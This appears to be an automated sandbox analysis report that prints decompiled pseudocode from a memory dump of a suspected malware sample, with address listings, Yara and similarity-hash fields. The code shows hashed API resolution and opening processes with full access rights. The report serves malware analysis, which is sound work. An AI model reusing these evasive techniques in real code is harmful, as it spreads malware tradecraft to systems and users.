                                                                                                                                      					__eflags =  *(_t458 + 0x20);
                                                                                                                                      					if( *(_t458 + 0x20) > 0) {
                                                                                                                                      						_t325 = 0;
                                                                                                                                      						__eflags = 0;
                                                                                                                                      						do {
                                                                                                                                      							 *(_t458 + 0x7c) = _t325 * 4;
                                                                                                                                      							_t433 = E7322F558(_t458 + 0x28, _t325 * 4);
                                                                                                                                      							_t258 =  *(_t458 + 4);
                                                                                                                                      							_t435 =  *_t258;
                                                                                                                                      							__eflags = _t435;
                                                                                                                                      							if(_t435 <= 0) {
                                                                                                                                      								L29:
                                                                                                                                      								_t445 = E73232F8C(0x4bcc7cba, 0x997e6547);
                                                                                                                                      								__eflags = _t445;
                                                                                                                                      								if(_t445 != 0) {
                                                                                                                                      									_t447 =  *_t445(0x1fffff, 0,  *((intOrPtr*)(E7322F558(_t458 + 0x28,  *(_t458 + 0x7c)))));
                                                                                                                                      									__eflags = _t447;
                                                                                                                                      									if(_t447 != 0) {
                                                                                                                                      										E7322F8C4( *(_t458 + 4), E7322F568( *_t458) + 4);
                                                                                                                                      										 *(E7322F558( *(_t458 + 4), E7322F568( *_t458) + 0xfffffffc)) = _t447;
                                                                                                                                      										 *((intOrPtr*)( *((intOrPtr*)(_t458 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t458 + 0x28 - 0x20)) + 0x18)) + 1;
                                                                                                                                      										_t269 = E7322F558(_t458 + 0x28,  *(_t458 + 0x7c));
                                                                                                                                      										 *((intOrPtr*)(_t458 + 0x70)) =  *(_t458 + 4) + 4;
                                                                                                                                      										E7322F8C4( *((intOrPtr*)(_t458 + 0x74)), E7322F568( *(_t458 + 4) + 4) + 4);
                                                                                                                                      										 *((intOrPtr*)(E7322F558( *((intOrPtr*)(_t458 + 0x74)), E7322F568( *((intOrPtr*)(_t458 + 0x70))) + 0xfffffffc))) =  *_t269;
                                                                                                                                      										_t277 =  *(_t458 + 4);
                                                                                                                                      										 *_t277 =  *_t277 + 1;
                                                                                                                                      										__eflags =  *_t277;
                                                                                                                                      									}
                                                                                                                                      								}
                                                                                                                                      							} else {
                                                                                                                                      								_t446 = 0;
                                                                                                                                      								__eflags = 0;
                                                                                                                                      								 *(_t458 + 0x88) =  &(_t258[1]);
                                                                                                                                      								while(1) {
                                                                                                                                      									_t279 = E7322F558( *((intOrPtr*)(_t458 + 0x8c)), _t446 * 4);
                                                                                                                                      									__eflags =  *_t279 -  *_t433;
                                                                                                                                      									if( *_t279 ==  *_t433) {
                                                                                                                                      										break;
                                                                                                                                      									}
                                                                                                                                      									_t446 = _t446 + 1;
                                                                                                                                      									__eflags = _t446 - _t435;
                                                                                                                                      									if(_t446 < _t435) {
                                                                                                                                      										continue;
                                                                                                                                      									} else {
                                                                                                                                      										goto L29;
                                                                                                                                      									}
                                                                                                                                      									goto L32;
                                                                                                                                      								}
                                                                                                                                      								__eflags = _t446 - 0xffffffff;
                                                                                                                                      								if(_t446 == 0xffffffff) {
                                                                                                                                      									goto L29;
                                                                                                                                      								} else {
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      							L32:
                                                                                                                                      							_t325 = _t325 + 1;
                                                                                                                                      							__eflags = _t325 -  *(_t458 + 0x20);
                                                                                                                                      						} while (_t325 <  *(_t458 + 0x20));
                                                                                                                                      					}
                                                                                                                                      					E7322F6F0(_t458 + 0x24);
                                                                                                                                      					_t173 =  *(_t458 + 4);
                                                                                                                                      					__eflags = _t173[0xb];
                                                                                                                                      					if(_t173[0xb] != 0) {
                                                                                                                                      						_t432 =  *_t173;
                                                                                                                                      						__eflags = _t432;
                                                                                                                                      						if(_t432 > 0) {
                                                                                                                                      							_t435 = 0;
                                                                                                                                      							__eflags = 0;
                                                                                                                                      							_t324 =  &(_t173[1]);
                                                                                                                                      							while(1) {
                                                                                                                                      								_t441 = _t435 * 4;
                                                                                                                                      								_t217 = E7322F558(_t324, _t441);
                                                                                                                                      								_t218 =  *(_t458 + 4);
                                                                                                                                      								__eflags =  *_t217 -  *((intOrPtr*)(_t218 + 0x30));
                                                                                                                                      								if( *_t217 ==  *((intOrPtr*)(_t218 + 0x30))) {
                                                                                                                                      									break;
                                                                                                                                      								}
                                                                                                                                      								_t435 = _t435 + 1;
                                                                                                                                      								__eflags = _t435 - _t432;
                                                                                                                                      								if(_t435 < _t432) {
                                                                                                                                      									continue;
                                                                                                                                      								}
                                                                                                                                      								goto L46;
                                                                                                                                      							}
                                                                                                                                      							__eflags = _t435 - 0xffffffff;
                                                                                                                                      							if(_t435 != 0xffffffff) {
                                                                                                                                      								_t219 = E7322F568( *_t458);
                                                                                                                                      								__eflags = _t219 - _t441;
                                                                                                                                      								if(_t219 > _t441) {
                                                                                                                                      									 *((intOrPtr*)(_t458 + 0x74)) = 4 + _t435 * 4;
                                                                                                                                      									_t247 = E7322F568( *_t458);
                                                                                                                                      									__eflags = _t247 -  *((intOrPtr*)(_t458 + 0x74));
                                                                                                                                      									if(_t247 >  *((intOrPtr*)(_t458 + 0x74))) {
                                                                                                                                      										 *((intOrPtr*)(_t458 + 0x90)) = E7322F558( *(_t458 + 4), _t441);
                                                                                                                                      										 *((intOrPtr*)(_t458 + 0x8c)) = E7322F558( *(_t458 + 4),  *((intOrPtr*)(_t458 + 0x74)));
                                                                                                                                      										E7323382C( *((intOrPtr*)(_t458 + 0x98)),  *((intOrPtr*)(_t458 + 0x90)), E7322F568( *_t458) -  *((intOrPtr*)(_t458 + 0x74)));
                                                                                                                                      										_t458 = _t458 + 0xc;
                                                                                                                                      									}
                                                                                                                                      									E7322F8C4( *(_t458 + 4), E7322F568( *_t458) + 0xfffffffc);
                                                                                                                                      									_t424 =  *(_t458 + 4);
                                                                                                                                      									_t75 = _t424 + 0x18;
                                                                                                                                      									 *_t75 =  *(_t424 + 0x18) - 1;
                                                                                                                                      									__eflags =  *_t75;
                                                                                                                                      								}
                                                                                                                                      								_t220 = E7322F568(_t324);
                                                                                                                                      								__eflags = _t220 - _t441;
                                                                                                                                      								if(_t220 > _t441) {
                                                                                                                                      									_t435 = 4 + _t435 * 4;
                                                                                                                                      									_t237 = E7322F568(_t324);
                                                                                                                                      									__eflags = _t237 - _t435;
                                                                                                                                      									if(_t237 > _t435) {
                                                                                                                                      										_t238 = E7322F558(_t324, _t441);
                                                                                                                                      										 *((intOrPtr*)(_t458 + 0x94)) = E7322F558(_t324, _t435);
                                                                                                                                      										E7323382C(_t238,  *((intOrPtr*)(_t458 + 0x98)), E7322F568(_t324) - _t435);
                                                                                                                                      										_t458 = _t458 + 0xc;
                                                                                                                                      									}
                                                                                                                                      									E7322F8C4(_t324, E7322F568(_t324) + 0xfffffffc);
                                                                                                                                      									_t246 =  *(_t458 + 4);
                                                                                                                                      									 *_t246 =  *_t246 - 1;
                                                                                                                                      									__eflags =  *_t246;
                                                                                                                                      								}
                                                                                                                                      								E7322F8C4( *(_t458 + 4), E7322F568( *_t458) + 4);
                                                                                                                                      								 *(E7322F558( *(_t458 + 4), E7322F568( *_t458) + 0xfffffffc)) =  *( *(_t458 + 4) + 0x2c);
                                                                                                                                      								 *((intOrPtr*)( *(_t458 + 4) + 0x18)) =  *((intOrPtr*)( *(_t458 + 4) + 0x18)) + 1;
                                                                                                                                      								E7322F8C4(_t324, E7322F568(_t324) + 4);
                                                                                                                                      								 *((intOrPtr*)(E7322F558(_t324, E7322F568(_t324) + 0xfffffffc))) =  *((intOrPtr*)( *(_t458 + 4) + 0x30));
                                                                                                                                      								 *( *(_t458 + 4)) =  *( *(_t458 + 4)) + 1;
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      					L46:
                                                                                                                                      					 *((intOrPtr*)(_t458 + 8)) = 0;
                                                                                                                                      					 *((intOrPtr*)(_t458 + 0xc)) = 0;
                                                                                                                                      					E7322F620(_t458 + 0x14, 0);
                                                                                                                                      					 *((intOrPtr*)(_t458 + 0x34)) =  *((intOrPtr*)(_t458 + 0x68));
                                                                                                                                      					 *((intOrPtr*)(_t458 + 0x38)) = 0;
                                                                                                                                      					E7322F620(_t458 + 0x40, 0);
                                                                                                                                      					_t178 =  *(_t458 + 4);
                                                                                                                                      					_t416 = 0x40;
                                                                                                                                      					__eflags =  *((intOrPtr*)(_t178 + 0x18)) - 0x40;
                                                                                                                                      					_t417 =  <  ?  *((void*)(_t178 + 0x18)) : _t416;
                                                                                                                                      					 *(_t458 + 0x80) = _t417;
                                                                                                                                      					__eflags = _t417;
                                                                                                                                      					if(_t417 <= 0) {
                                                                                                                                      						L57:
                                                                                                                                      						_t415 = E7322F558(_t458 + 0x14, 0);
                                                                                                                                      						_t180 = E73232878( *((intOrPtr*)(_t458 + 0xc)), _t179, 0x3e8);
                                                                                                                                      						_t132 = _t180 - 0x80; // -128
                                                                                                                                      						_t181 = _t132;
                                                                                                                                      						__eflags = _t181 - 0x3f;
                                                                                                                                      						_t316 =  <=  ? _t181 : _t180;
                                                                                                                                      						__eflags = _t316 - 0x102;
                                                                                                                                      						if(_t316 == 0x102) {
                                                                                                                                      							goto L59;
                                                                                                                                      						} else {
                                                                                                                                      							__eflags = _t316 - 0x3f;
                                                                                                                                      							if(_t316 <= 0x3f) {
                                                                                                                                      								__eflags = _t316 << 2;
                                                                                                                                      								 *((intOrPtr*)( *((intOrPtr*)(_t458 + 8)) + 0x2c)) =  *((intOrPtr*)(E7322F558( *(_t458 + 4), _t316 << 2)));
                                                                                                                                      								_t188 = E7322F558( *(_t458 + 0x7c), _t316 << 2);
                                                                                                                                      								_t415 =  *(_t458 + 4);
                                                                                                                                      								 *((intOrPtr*)(_t415 + 0x30)) =  *_t188;
                                                                                                                                      								_t318 =  *((intOrPtr*)(_t415 + 0x2c));
                                                                                                                                      								E7322B680(_t458 + 0x34);
                                                                                                                                      								E7322B680(_t458 + 8);
                                                                                                                                      							} else {
                                                                                                                                      								goto L59;
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      						goto L62;
                                                                                                                                      					} else {
                                                                                                                                      						_t454 = 0;
                                                                                                                                      						__eflags = 0;
                                                                                                                                      						while(1) {
                                                                                                                                      							E7322CB48(_t458 + 0x4c);
                                                                                                                                      							_t415 = 0;
                                                                                                                                      							_t345 = _t458 + 0x4c;
                                                                                                                                      							 *((char*)(_t345 + 4)) = 0;
                                                                                                                                      							 *((intOrPtr*)(_t345 + 0x20)) = 0;
                                                                                                                                      							__eflags = E7322C33C(_t345);
                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                      								break;
                                                                                                                                      							}
                                                                                                                                      							E7322F8C4(_t458 + 0x14, E7322F568(_t458 + 0x10) + 4);
                                                                                                                                      							 *((intOrPtr*)(E7322F558(_t458 + 0x14, E7322F568(_t458 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t458 + 0x4c));
                                                                                                                                      							 *((intOrPtr*)(_t458 + 0xc)) =  *((intOrPtr*)(_t458 + 0xc)) + 1;
                                                                                                                                      							_t202 = E73232F8C(0xa5eabdf8, 0xf3119fba);
                                                                                                                                      							__eflags = _t202;
                                                                                                                                      							if(_t202 == 0) {
                                                                                                                                      								_t415 =  *(_t458 + 0x6c);
                                                                                                                                      								__eflags = _t415;
                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                      									break;
                                                                                                                                      								} else {
                                                                                                                                      									__eflags = _t415 - 0xffffffff;
                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                      										E7322F8C4(_t458 + 0x40, E7322F568(_t458 + 0x3c) + 4);
                                                                                                                                      										 *(E7322F558(_t458 + 0x40, E7322F568(_t458 + 0x3c) + 0xfffffffc)) =  *(_t458 + 0x6c);
                                                                                                                                      										 *((intOrPtr*)(_t458 + 0x4c - 0x14)) =  *((intOrPtr*)(_t458 + 0x4c - 0x14)) + 1;
                                                                                                                                      										E7322CDE0(_t458 + 0x4c, __eflags);
                                                                                                                                      										_t454 = _t454 + 1;
                                                                                                                                      										__eflags = _t454 -  *(_t458 + 0x80);
                                                                                                                                      										if(_t454 <  *(_t458 + 0x80)) {
                                                                                                                                      											continue;
                                                                                                                                      										} else {
                                                                                                                                      											_t437 = 0;
                                                                                                                                      											__eflags = 0;
                                                                                                                                      											do {
                                                                                                                                      												_t211 = E7322F558( *(_t458 + 4), _t437 * 4);
                                                                                                                                      												_t212 = E7322F558(_t458 + 0x40, _t437 * 4);
                                                                                                                                      												E73228C14( *_t211, E7323034C(0xa5eabdf8, 0x4145240a),  *_t212, 0, 0);
                                                                                                                                      												_t437 = _t437 + 1;
                                                                                                                                      												__eflags = _t437 -  *(_t458 + 0x80);
                                                                                                                                      											} while (_t437 <  *(_t458 + 0x80));
                                                                                                                                      											goto L57;
                                                                                                                                      										}
                                                                                                                                      									} else {
                                                                                                                                      										break;
                                                                                                                                      									}
                                                                                                                                      								}
                                                                                                                                      							} else {
                                                                                                                                      								__eflags = 0;
                                                                                                                                      								_push(2);
                                                                                                                                      								_push(0);
                                                                                                                                      								_push(0);
                                                                                                                                      								_push(_t458 + 0x6c);
                                                                                                                                      								_push( *((intOrPtr*)(_t458 + 0x78)));
                                                                                                                                      								_push( *((intOrPtr*)(_t458 + 0x60)));
                                                                                                                                      								_push(0xffffffff);
                                                                                                                                      								asm("int3");
                                                                                                                                      								return _t202;
                                                                                                                                      							}
                                                                                                                                      							goto L71;
                                                                                                                                      						}
                                                                                                                                      						E7322CDE0(_t458 + 0x4c, __eflags);
                                                                                                                                      						L59:
                                                                                                                                      						E7322B680(_t458 + 0x34);
                                                                                                                                      						E7322B680(_t458 + 8);
                                                                                                                                      						goto L60;
                                                                                                                                      					}
                                                                                                                                      					goto L71;
                                                                                                                                      				}
                                                                                                                                      			}
























































                                                                                                                                      0x732284e4
                                                                                                                                      0x732284e8
                                                                                                                                      0x732284f1
                                                                                                                                      0x732284f7
                                                                                                                                      0x732284fb
                                                                                                                                      0x732284ff
                                                                                                                                      0x7322850a
                                                                                                                                      0x7322850e
                                                                                                                                      0x73228513
                                                                                                                                      0x7322851b
                                                                                                                                      0x7322852b
                                                                                                                                      0x00000000
                                                                                                                                      0x7322852d
                                                                                                                                      0x73228535
                                                                                                                                      0x7322853c
                                                                                                                                      0x7322853c
                                                                                                                                      0x73228a8f
                                                                                                                                      0x73228a91
                                                                                                                                      0x73228ad2
                                                                                                                                      0x73228ad4
                                                                                                                                      0x73228ae3
                                                                                                                                      0x73228aef
                                                                                                                                      0x73228ad6
                                                                                                                                      0x73228ade
                                                                                                                                      0x73228af5
                                                                                                                                      0x73228afa
                                                                                                                                      0x00000000
                                                                                                                                      0x73228ae0
                                                                                                                                      0x73228ae2
                                                                                                                                      0x00000000
                                                                                                                                      0x73228ae2
                                                                                                                                      0x73228ade
                                                                                                                                      0x00000000
                                                                                                                                      0x73228546
                                                                                                                                      0x7322854a
                                                                                                                                      0x7322854d
                                                                                                                                      0x73228553
                                                                                                                                      0x73228553
                                                                                                                                      0x73228555
                                                                                                                                      0x7322855c
                                                                                                                                      0x7322856a
                                                                                                                                      0x7322856c
                                                                                                                                      0x73228570
                                                                                                                                      0x73228572
                                                                                                                                      0x7322859e
                                                                                                                                      0x732285a2
                                                                                                                                      0x732285a7
                                                                                                                                      0x732285ac
                                                                                                                                      0x732285b0
                                                                                                                                      0x732285b4
                                                                                                                                      0x732285bb
                                                                                                                                      0x732285c0
                                                                                                                                      0x732285c2
                                                                                                                                      0x73228b51
                                                                                                                                      0x73228b60
                                                                                                                                      0x73228b7f
                                                                                                                                      0x73228b84
                                                                                                                                      0x73228b84
                                                                                                                                      0x732285d5
                                                                                                                                      0x732285da
                                                                                                                                      0x732285de
                                                                                                                                      0x732285de
                                                                                                                                      0x732285de
                                                                                                                                      0x732285ef
                                                                                                                                      0x732285f1
                                                                                                                                      0x732285f3
                                                                                                                                      0x73228604
                                                                                                                                      0x73228604
                                                                                                                                      0x73228609
                                                                                                                                      0x7322860e
                                                                                                                                      0x73228612
                                                                                                                                      0x73228617
                                                                                                                                      0x7322861e
                                                                                                                                      0x73228623
                                                                                                                                      0x73228625
                                                                                                                                      0x73228b13
                                                                                                                                      0x73228b1f
                                                                                                                                      0x73228b39
                                                                                                                                      0x73228b3e
                                                                                                                                      0x73228b3e
                                                                                                                                      0x7322863b
                                                                                                                                      0x73228640
                                                                                                                                      0x73228644
                                                                                                                                      0x73228644
                                                                                                                                      0x73228644
                                                                                                                                      0x73228644
                                                                                                                                      0x73228647
                                                                                                                                      0x73228647
                                                                                                                                      0x73228574
                                                                                                                                      0x73228576
                                                                                                                                      0x73228576
                                                                                                                                      0x73228578
                                                                                                                                      0x73228584
                                                                                                                                      0x7322858b
                                                                                                                                      0x7322858d
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x73228599
                                                                                                                                      0x7322859a
                                                                                                                                      0x7322859c
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x7322859c
                                                                                                                                      0x7322858f
                                                                                                                                      0x73228592
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x73228594
                                                                                                                                      0x73228592
                                                                                                                                      0x73228648
                                                                                                                                      0x7322864c
                                                                                                                                      0x7322864d
                                                                                                                                      0x7322864d
                                                                                                                                      0x73228555
                                                                                                                                      0x73228655
                                                                                                                                      0x7322865a
                                                                                                                                      0x73228660
                                                                                                                                      0x73228660
                                                                                                                                      0x73228662
                                                                                                                                      0x73228669
                                                                                                                                      0x73228677
                                                                                                                                      0x73228679
                                                                                                                                      0x7322867d
                                                                                                                                      0x7322867f
                                                                                                                                      0x73228681
                                                                                                                                      0x732286bc
                                                                                                                                      0x732286cb
                                                                                                                                      0x732286cd
                                                                                                                                      0x732286cf
                                                                                                                                      0x732286ed
                                                                                                                                      0x732286ef
                                                                                                                                      0x732286f1
                                                                                                                                      0x73228703
                                                                                                                                      0x73228721
                                                                                                                                      0x7322872a
                                                                                                                                      0x7322872d
                                                                                                                                      0x7322873b
                                                                                                                                      0x7322874c
                                                                                                                                      0x7322876a
                                                                                                                                      0x7322876c
                                                                                                                                      0x73228770
                                                                                                                                      0x73228770
                                                                                                                                      0x73228770
                                                                                                                                      0x732286f1
                                                                                                                                      0x73228683
                                                                                                                                      0x73228687
                                                                                                                                      0x73228687
                                                                                                                                      0x7322868c
                                                                                                                                      0x73228693
                                                                                                                                      0x732286a2
                                                                                                                                      0x732286a9
                                                                                                                                      0x732286ab
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x732286b7
                                                                                                                                      0x732286b8
                                                                                                                                      0x732286ba
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x732286ba
                                                                                                                                      0x732286ad
                                                                                                                                      0x732286b0
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x732286b2
                                                                                                                                      0x732286b0
                                                                                                                                      0x73228772
                                                                                                                                      0x73228772
                                                                                                                                      0x73228773
                                                                                                                                      0x73228773
                                                                                                                                      0x73228662
                                                                                                                                      0x73228781
                                                                                                                                      0x73228786
                                                                                                                                      0x7322878a
                                                                                                                                      0x7322878e
                                                                                                                                      0x73228794
                                                                                                                                      0x73228796
                                                                                                                                      0x73228798
                                                                                                                                      0x732287a2
                                                                                                                                      0x732287a2
                                                                                                                                      0x732287a4
                                                                                                                                      0x732287a7
                                                                                                                                      0x732287a9
                                                                                                                                      0x732287b1
                                                                                                                                      0x732287b8
                                                                                                                                      0x732287bc
                                                                                                                                      0x732287bf
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x732288bb
                                                                                                                                      0x732288bc
                                                                                                                                      0x732288be
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x732288be
                                                                                                                                      0x732287c5
                                                                                                                                      0x732287c8
                                                                                                                                      0x732287d1
                                                                                                                                      0x732287d6
                                                                                                                                      0x732287d8
                                                                                                                                      0x732287e4
                                                                                                                                      0x732287e8
                                                                                                                                      0x732287ed
                                                                                                                                      0x732287f1
                                                                                                                                      0x73228bce
                                                                                                                                      0x73228be2
                                                                                                                                      0x73228c04
                                                                                                                                      0x73228c09
                                                                                                                                      0x73228c09
                                                                                                                                      0x73228807
                                                                                                                                      0x7322880c
                                                                                                                                      0x73228810
                                                                                                                                      0x73228810
                                                                                                                                      0x73228810
                                                                                                                                      0x73228810
                                                                                                                                      0x73228815
                                                                                                                                      0x7322881a
                                                                                                                                      0x7322881c
                                                                                                                                      0x73228820
                                                                                                                                      0x73228827
                                                                                                                                      0x7322882c
                                                                                                                                      0x7322882e
                                                                                                                                      0x73228b8f
                                                                                                                                      0x73228b9e
                                                                                                                                      0x73228bb7
                                                                                                                                      0x73228bbc
                                                                                                                                      0x73228bbc
                                                                                                                                      0x73228841
                                                                                                                                      0x73228846
                                                                                                                                      0x7322884a
                                                                                                                                      0x7322884a
                                                                                                                                      0x7322884a
                                                                                                                                      0x7322885c
                                                                                                                                      0x7322887d
                                                                                                                                      0x73228885
                                                                                                                                      0x73228893
                                                                                                                                      0x732288b1
                                                                                                                                      0x732288b7
                                                                                                                                      0x732288b7
                                                                                                                                      0x732287c8
                                                                                                                                      0x73228798
                                                                                                                                      0x732288c4
                                                                                                                                      0x732288c6
                                                                                                                                      0x732288ca
                                                                                                                                      0x732288d3
                                                                                                                                      0x732288de
                                                                                                                                      0x732288e2
                                                                                                                                      0x732288eb
                                                                                                                                      0x732288f0
                                                                                                                                      0x732288f6
                                                                                                                                      0x732288f7
                                                                                                                                      0x732288fb
                                                                                                                                      0x732288ff
                                                                                                                                      0x73228906
                                                                                                                                      0x73228908
                                                                                                                                      0x73228a48
                                                                                                                                      0x73228a59
                                                                                                                                      0x73228a60
                                                                                                                                      0x73228a67
                                                                                                                                      0x73228a67
                                                                                                                                      0x73228a6a
                                                                                                                                      0x73228a6d
                                                                                                                                      0x73228a70
                                                                                                                                      0x73228a76
                                                                                                                                      0x00000000
                                                                                                                                      0x73228a78
                                                                                                                                      0x73228a78
                                                                                                                                      0x73228a7b
                                                                                                                                      0x73228a94
                                                                                                                                      0x73228aac
                                                                                                                                      0x73228aaf
                                                                                                                                      0x73228ab4
                                                                                                                                      0x73228abe
                                                                                                                                      0x73228ac1
                                                                                                                                      0x73228ac4
                                                                                                                                      0x73228acd
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x73228a7b
                                                                                                                                      0x00000000
                                                                                                                                      0x7322890e
                                                                                                                                      0x73228910
                                                                                                                                      0x73228910
                                                                                                                                      0x73228912
                                                                                                                                      0x73228916
                                                                                                                                      0x7322891b
                                                                                                                                      0x7322891d
                                                                                                                                      0x73228921
                                                                                                                                      0x73228924
                                                                                                                                      0x7322892c
                                                                                                                                      0x7322892e
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x73228945
                                                                                                                                      0x73228960
                                                                                                                                      0x73228962
                                                                                                                                      0x73228970
                                                                                                                                      0x73228975
                                                                                                                                      0x73228977
                                                                                                                                      0x73228994
                                                                                                                                      0x73228998
                                                                                                                                      0x7322899a
                                                                                                                                      0x00000000
                                                                                                                                      0x7322899c
                                                                                                                                      0x7322899c
                                                                                                                                      0x7322899f
                                                                                                                                      0x732289c0
                                                                                                                                      0x732289df
                                                                                                                                      0x732289e5
                                                                                                                                      0x732289e8
                                                                                                                                      0x732289ed
                                                                                                                                      0x732289ee
                                                                                                                                      0x732289f5
                                                                                                                                      0x00000000
                                                                                                                                      0x732289fb
                                                                                                                                      0x732289fd
                                                                                                                                      0x732289fd
                                                                                                                                      0x732289ff
                                                                                                                                      0x73228a0b
                                                                                                                                      0x73228a17
                                                                                                                                      0x73228a39
                                                                                                                                      0x73228a3e
                                                                                                                                      0x73228a3f
                                                                                                                                      0x73228a3f
                                                                                                                                      0x00000000
                                                                                                                                      0x732289ff
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x7322899f
                                                                                                                                      0x73228979
                                                                                                                                      0x73228979
                                                                                                                                      0x7322897f
                                                                                                                                      0x73228981
                                                                                                                                      0x73228982
                                                                                                                                      0x73228983
                                                                                                                                      0x73228984
                                                                                                                                      0x73228988
                                                                                                                                      0x7322898c
                                                                                                                                      0x7322898e
                                                                                                                                      0x7322898f
                                                                                                                                      0x7322898f
                                                                                                                                      0x00000000
                                                                                                                                      0x73228977
                                                                                                                                      0x732289a5
                                                                                                                                      0x73228a7d
                                                                                                                                      0x73228a81
                                                                                                                                      0x73228a8a
                                                                                                                                      0x00000000
                                                                                                                                      0x73228a8a
                                                                                                                                      0x00000000
                                                                                                                                      0x73228908

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.496037557.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.495992673.0000000073220000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496245350.000000007323A000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496331831.000000007323D000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496415452.000000007323F000.00000002.00020000.sdmp Download File
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 0-3916222277
                                                                                                                                      • Opcode ID: 7789571b791fbddc5c12bb3bfe1020c8ae27195bcf9eda4ceeed74e3e4e8d1e4
                                                                                                                                      • Instruction ID: 38e49634b7569cc6c3e38de59ba36050e00041276eea323277feb3b1dd77cee5
                                                                                                                                      • Opcode Fuzzy Hash: 7789571b791fbddc5c12bb3bfe1020c8ae27195bcf9eda4ceeed74e3e4e8d1e4
                                                                                                                                      • Instruction Fuzzy Hash: 01127C71209345AFE714DF24CD80B6EBBF5AF95202F02492DE5AA872A0DF74DD94CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 90%
                                                                                                                                      			E732314D8(signed char __eax, signed char __edx) {
                                                                                                                                      				void* __ebx;
                                                                                                                                      				void* __esi;
                                                                                                                                      				void* __ebp;
                                                                                                                                      				signed char _t231;
                                                                                                                                      				signed char _t233;
                                                                                                                                      				signed char _t238;
                                                                                                                                      				intOrPtr _t241;
                                                                                                                                      				void* _t246;
                                                                                                                                      				signed char _t257;
                                                                                                                                      				signed char _t261;
                                                                                                                                      				signed char _t269;
                                                                                                                                      				signed char _t270;
                                                                                                                                      				signed char _t277;
                                                                                                                                      				signed int _t279;
                                                                                                                                      				signed char _t280;
                                                                                                                                      				signed char _t281;
                                                                                                                                      				void* _t289;
                                                                                                                                      				void* _t290;
                                                                                                                                      				signed char _t315;
                                                                                                                                      				void* _t319;
                                                                                                                                      				signed char _t334;
                                                                                                                                      				signed char _t336;
                                                                                                                                      				void* _t341;
                                                                                                                                      				void* _t347;
                                                                                                                                      				intOrPtr _t352;
                                                                                                                                      				signed char _t354;
                                                                                                                                      				signed char _t363;
                                                                                                                                      				void* _t369;
                                                                                                                                      				intOrPtr _t371;
                                                                                                                                      				signed short* _t373;
                                                                                                                                      				void _t375;
                                                                                                                                      				void* _t379;
                                                                                                                                      				signed int _t381;
                                                                                                                                      				void* _t382;
                                                                                                                                      				void** _t383;
                                                                                                                                      				void* _t384;
                                                                                                                                      				char* _t387;
                                                                                                                                      				signed char _t395;
                                                                                                                                      				signed char* _t396;
                                                                                                                                      				intOrPtr _t400;
                                                                                                                                      				signed int _t451;
                                                                                                                                      				intOrPtr* _t455;
                                                                                                                                      				signed char _t456;
                                                                                                                                      				signed int _t462;
                                                                                                                                      				void* _t467;
                                                                                                                                      				signed char _t471;
                                                                                                                                      				signed char _t472;
                                                                                                                                      				signed char* _t477;
                                                                                                                                      				signed char _t487;
                                                                                                                                      				signed int _t490;
                                                                                                                                      				intOrPtr* _t496;
                                                                                                                                      				intOrPtr _t497;
                                                                                                                                      				signed char _t498;
                                                                                                                                      				signed char _t499;
                                                                                                                                      				intOrPtr _t500;
                                                                                                                                      				signed char _t508;
                                                                                                                                      				intOrPtr _t510;
                                                                                                                                      				void* _t513;
                                                                                                                                      				signed char _t519;
                                                                                                                                      				intOrPtr* _t524;
                                                                                                                                      				signed char _t525;
                                                                                                                                      				signed char _t526;
                                                                                                                                      				signed char _t527;
                                                                                                                                      				signed char _t529;
                                                                                                                                      				signed char* _t531;
                                                                                                                                      				signed char _t532;
                                                                                                                                      				void* _t533;
                                                                                                                                      				void* _t534;
                                                                                                                                      				signed char* _t535;
                                                                                                                                      
                                                                                                                                      				_t535[0x54] = __edx;
                                                                                                                                      				 *_t535 = __eax;
                                                                                                                                      				_t231 = E732303A0(__edx, 1);
                                                                                                                                      				if(_t231 != 0) {
                                                                                                                                      					return _t231;
                                                                                                                                      				}
                                                                                                                                      				_t535[0x2c] = _t231;
                                                                                                                                      				if( *0x7323d208 == 0 ||  *0x7323d2e4 != 0) {
                                                                                                                                      					L44:
                                                                                                                                      					if( *_t535 == 0) {
                                                                                                                                      						return 0;
                                                                                                                                      					}
                                                                                                                                      					_t233 =  *_t535;
                                                                                                                                      					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
                                                                                                                                      					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
                                                                                                                                      					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
